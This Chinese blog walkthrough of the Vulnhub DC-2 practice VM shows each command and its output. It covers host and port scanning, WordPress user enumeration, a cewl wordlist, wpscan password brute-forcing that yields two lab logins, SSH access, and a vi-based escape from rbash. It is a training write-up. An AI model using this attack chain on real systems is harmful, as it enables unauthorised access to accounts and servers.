关于本文的所有留言评论与转载、引用文纯属文字原作者个人观点,与本文观点及立场无关;浏览者在本文发表信息时需要遵守中国现行相应法律,不得发布违法信息;本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,通过使用本文内容随之而来的风险与本文无关;禁止一切未授权进行渗透测试活动,违者与作者无关;本文只是供学习和研究使用。
前言
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行,本文使用VMware测试,每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和获得flag。
一、环境配置
官网:https://www.vulnhub.com
1.在官网搜索你想要的镜像,然后下载【建议下载 (Mirror)版本】
2.下载好后解压得到dc-2.ova的文件
3.在Vmware中导入下载解压后的dc-2.ova,点击“文件”→“打开”
4.将DC-2虚拟机环境的网络模式设置为nat模式
5.导入成功以后,在“我的计算机”中,
选中“DC-2”,点击“鼠标右键”→“管理(M)”→“更改硬件兼容性(H)”’
在弹出的选项框中,选择“我已复制该虚拟机”→“下一步”→“硬件兼容性”**选择低版本(如Workstation 16.2.x)**→“下一步”→选择“更改此虚拟机(A)”→“下一步”→完成硬件兼容性更改。【此步骤是非必要步骤,当修改虚拟机网络出现闪退时,执行第5步操作】
6.拍摄快照,点击“鼠标右键”→选择“拍摄快照”→输入“初始化状态”【该步骤可以在渗透测试不成功或者环境损害的时候,恢复初始化环境】
二、信息收集
2.1 主机发现
使用kali系统的arp-scan工具,扫描kali系统所处的网络环境(192.168.6.0)
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.1 00:50:56:c0:00:08 VMware, Inc. (DUP: 2)
192.168.6.154 00:0c:29:fa:50:aa VMware, Inc.
192.168.6.254 00:50:56:fa:ae:e4 VMware, Inc.
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.348 seconds (109.03 hosts/sec). 4 responded
获得目标主机信息
目标主机信息:
IP地址:192.168.6.154
MAC地址:00:0c:29:fa:50:aa
2.2 端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV -p- 192.168.6.154
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 03:48 EDT
Nmap scan report for 192.168.6.154
Host is up (0.00089s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:FA:50:AA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.61 seconds
扫描结果显示:
DC-2目标靶机开放的端口有80和7744端口,
80端口为:http服务,协议及版本为:Apache httpd 2.4.10 ((Debian)) ,
7744端口为:ssh服务, 版本号为:OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
2.3 网站指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.154
WhatWeb report for http://192.168.6.154
Status : 301 Moved Permanently
Title : <None>
IP : 192.168.6.154
Country : RESERVED, ZZ
Summary : Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], RedirectLocation[http://dc-2/]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.10 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.10 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://dc-2/ (from location)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Sat, 18 May 2024 16:16:32 GMT
Server: Apache/2.4.10 (Debian)
Location: http://dc-2/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
扫描结果显示:Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], RedirectLocation[http://dc-2/]
三、渗透测试
flag1
1.修改hosts文件
hosts文件路径:
C:\Windows\System32\drivers\etc\hosts
2.添加内容
192.168.6.154 dc-2
3.返回页面:
4.获得flag1
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
提示用cewl来获取密码,所以应该是爆破密码之类的,且提示自己所有的密码字典可能无效,且有时没法获得所有密码,提示用其他的身份去登录。
flag2
1.目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.154 -e *
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: dc-1.gnmap | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.6.154/_24-05-18_06-07-55.txt
Target: http://192.168.6.154/
[06:07:55] Starting:
[06:08:00] 403 - 299B - /.ht_wsr.txt
[06:08:00] 403 - 303B - /.htaccess_extra
[06:08:00] 403 - 300B - /.htaccessBAK
[06:08:00] 403 - 300B - /.htaccess_sc
[06:08:00] 403 - 302B - /.htaccess.bak1
[06:08:00] 403 - 301B - /.htaccessOLD2
[06:08:00] 403 - 302B - /.htaccess.orig
[06:08:00] 403 - 304B - /.htaccess.sample
[06:08:00] 403 - 302B - /.htaccess.save
[06:08:00] 403 - 300B - /.htaccessOLD
[06:08:00] 403 - 292B - /.htm
[06:08:00] 403 - 299B - /.httr-oauth
[06:08:00] 403 - 298B - /.htpasswds
[06:08:00] 403 - 302B - /.htaccess_orig
[06:08:00] 403 - 302B - /.htpasswd_test
[06:08:00] 403 - 293B - /.html
[06:08:03] 403 - 293B - /.php3
[06:08:03] 403 - 292B - /.php
[06:08:51] 200 - 18KB - /index.php
[06:08:52] 404 - 50KB - /index.php/login/
[06:08:56] 200 - 7KB - /license.txt
[06:09:19] 200 - 3KB - /readme.html
[06:09:23] 403 - 302B - /server-status/
[06:09:23] 403 - 301B - /server-status
[06:09:46] 301 - 317B - /wp-admin -> http://192.168.6.154/wp-admin/
[06:09:47] 200 - 0B - /wp-config.php
[06:09:47] 301 - 319B - /wp-content -> http://192.168.6.154/wp-content/
[06:09:47] 200 - 1B - /wp-admin/admin-ajax.php
[06:09:47] 200 - 0B - /wp-content/
[06:09:47] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[06:09:47] 200 - 528B - /wp-admin/install.php
[06:09:47] 500 - 4KB - /wp-admin/setup-config.php
[06:09:47] 500 - 0B - /wp-content/plugins/hello.php
[06:09:47] 302 - 0B - /wp-admin/ -> http://dc-2/wp-login.php?redirect_to=http%3A%2F%2F192.168.6.154%2Fwp-admin%2F&reauth=1
[06:09:48] 500 - 0B - /wp-includes/rss-functions.php
[06:09:48] 200 - 4KB - /wp-includes/
[06:09:48] 200 - 0B - /wp-cron.php
[06:09:48] 301 - 320B - /wp-includes -> http://192.168.6.154/wp-includes/
[06:09:48] 302 - 0B - /wp-signup.php -> http://dc-2/wp-login.php?action=register
[06:09:48] 200 - 1KB - /wp-login.php
[06:09:49] 405 - 42B - /xmlrpc.php
Task Completed
获得WordPress site后台管理登录页面:
http://dc-2/wp-admin/user/admin.php
2.爬取页面生成字典
┌──(root㉿kali)-[/home/kali]
└─# cewl http://dc-2/index.php/flag/ -w passwd.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
3.用户名列举
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://dc-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.6.154]
[+] Started: Sat May 18 05:10:24 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <==========================================================> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat May 18 05:10:36 2024
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 13.834 KB
[+] Data Received: 514.805 KB
[+] Memory used: 201.492 MB
[+] Elapsed time: 00:00:12
获得用户名:admin,jerry,tom
4.保存用户名
──(root㉿kali)-[/home/kali]
└─# cat users.txt
admin
jerry
tom
5.wpscan爆破
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://dc-2 -U users.txt -P passwd.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.6.154]
[+] Started: Sat May 18 05:26:21 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / mus Time: 00:01:57 <============================================================================================ > (699 / 1175) 59.48% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat May 18 05:28:30 2024
[+] Requests Done: 839
[+] Cached Requests: 38
[+] Data Sent: 381.968 KB
[+] Data Received: 442.069 KB
[+] Memory used: 253.254 MB
[+] Elapsed time: 00:02:09
爆破获得用户名和密码:
Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
6.登录管理页面
切换页面到pages:
发现flag2:
Flag 2:
If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
提示:如果你不能利用WordPress并走捷径,还有另一种方法。希望你找到了另一个入口
flag3
1.尝试ssh登录
1.1尝试登录jerry
┌──(root㉿kali)-[/home/kali]
└─# ssh jerry@192.168.6.154 -p 7744
The authenticity of host '[192.168.6.154]:7744 ([192.168.6.154]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.6.154]:7744' (ED25519) to the list of known hosts.
jerry@192.168.6.154's password:
Permission denied, please try again.
显示错误,登录失败。
1.2尝试登录tom
┌──(root㉿kali)-[/home/kali]
└─# ssh tom@192.168.6.154 -p 7744
tom@192.168.6.154's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
ssh显示登录成功,用户名为:tom,密码为:parturient
2.查看tom系统的文件
2.1 执行ls命令
tom@DC-2:~$ ls
flag3.txt usr
发现fag3文件
2.2 尝试查看flag3文件
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
" command not found",查看flag3.txt失败,o(╥﹏╥)o
2.3 尝试tom用户可执行的命令
tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
while
until
do
done
in
function
time
{
}
!
[[
]]
coproc
__expand_tilde_by_ref
__get_cword_at_cursor_by_ref
__git_eread
__git_ps1
__git_ps1_colorize_gitstring
__git_ps1_show_upstream
__grub_dir
__grub_get_last_option
__grub_get_options_from_help
__grub_get_options_from_usage
__grub_list_menuentries
__grub_list_modules
__grubcomp
__ltrim_colon_completions
__parse_options
__reassemble_comp_words_by_ref
_a2disconf
_a2dismod
_a2dissite
_a2enconf
_a2enmod
_a2ensite
_allowed_groups
_allowed_users
_apache2_allcomp
_apache2_conf
_apache2_mods
_apache2_sites
_available_interfaces
_cd
_cd_devices
_command
_command_offset
_complete_as_root
_completion_loader
_configured_interfaces
_count_args
_debconf_show
_dvd_devices
_expand
_filedir
_filedir_xspec
_fstypes
_get_comp_words_by_ref
_get_cword
_get_first_arg
_get_pword
_gids
_grub_editenv
_grub_install
_grub_mkconfig
_grub_mkfont
_grub_mkimage
_grub_mkpasswd_pbkdf2
_grub_mkrescue
_grub_probe
_grub_script_check
_grub_set_entry
_grub_setup
_have
_init_completion
_insserv
_installed_modules
_ip_addresses
_kernel_versions
_known_hosts
_known_hosts_real
_longopt
_mac_addresses
_minimal
_modules
_ncpus
_parse_help
_parse_usage
_pci_ids
_pgids
_pids
_pnames
_pygmentize
_quote_readline_by_ref
_realcommand
_rl_enabled
_root_command
_service
_services
_shells
_signals
_split_longopt
_sysvdirs
_terms
_tilde
_uids
_update_initramfs
_upvar
_upvars
_usb_ids
_user_at_host
_usergroup
_userland
_variables
_xfunc
_xinetd_services
dequote
quote
quote_readline
.
:
[
alias
bg
bind
break
builtin
caller
cd
command
compgen
complete
compopt
continue
declare
dirs
disown
echo
enable
eval
exec
exit
export
false
fc
fg
getopts
hash
help
history
jobs
kill
let
local
logout
mapfile
popd
printf
pushd
pwd
read
readarray
readonly
return
set
shift
shopt
source
suspend
test
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi
发现less和vi命令可以使用
2.4 获得flag3
tom@DC-2:~$ less flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
提示切换用户
flag4
vi提权
1.输入如下命令
tom@DC-2:~$ vi flag3.txt
2.设置shell
输入如下内容,并按回车键:
:set shell=/bin/sh
3.执行shell
输入如下内容,并按回车键:
:shell
执行完上面的命令以后,我们将进入一个shell的交互界面
4.切换工作目录
$ cd /home
$ ls
jerry tom
$ cd jerry
$ ls
flag4.txt
发现flag4.txt文件
5.获得最终的flag
$ vi flag4.txt
Good to see that you’ve made it this far - but you’re not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you’re on your own now. 😃
Go on - git outta here!!!
测试总结
在DC-2靶场中,使用了nmap、whatweb、wpscan、dirsearch等工具进行渗透测试,使用nmap进行主机发现和端口扫描测试,使用cewl生成密码字典,使用whatweb信息网页信息搜集取到了关键信息,使用dirsearch进行目录扫描,使用wpscan进行爆破,最后进行了vi提权,并获得所有的flag,我们在面对靶机应该有以下思路:
- WordPress CMS的信息搜集与利用,获得flag,根据提示进一步操作
- 使用cewl获得目标上存在的用户信息,获得密码字典
- 使用wpscan进行WordPress网站用户名爆破,生成用户字典
- 使用wpscan进一步爆破获得可用的密码和用户
- 尝试ssh远程登录
- vi提权,并获得flag
参考文章
- DC-2环境:https://www.vulnhub.com/entry/dc-2%2C311/
- arp-scan使用:https://blog.csdn.net/newbeixue/article/details/123111543
- nmap详细使用教程:https://blog.csdn.net/smli_ng/article/details/105964486
- 黑客工具之whatweb详细使用教程:https://zhuanlan.zhihu.com/p/396345123
- dirsearch使用教程:https://blog.csdn.net/m0_48574718/article/details/129244162
- Kali(渗透工具):WPScan的使用(WordPress扫描工具):https://zhuanlan.zhihu.com/p/149725645
- vi编辑器的使用:https://blog.csdn.net/JunLeon/article/details/120407552
- dc-2渗透测试流程图
147
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
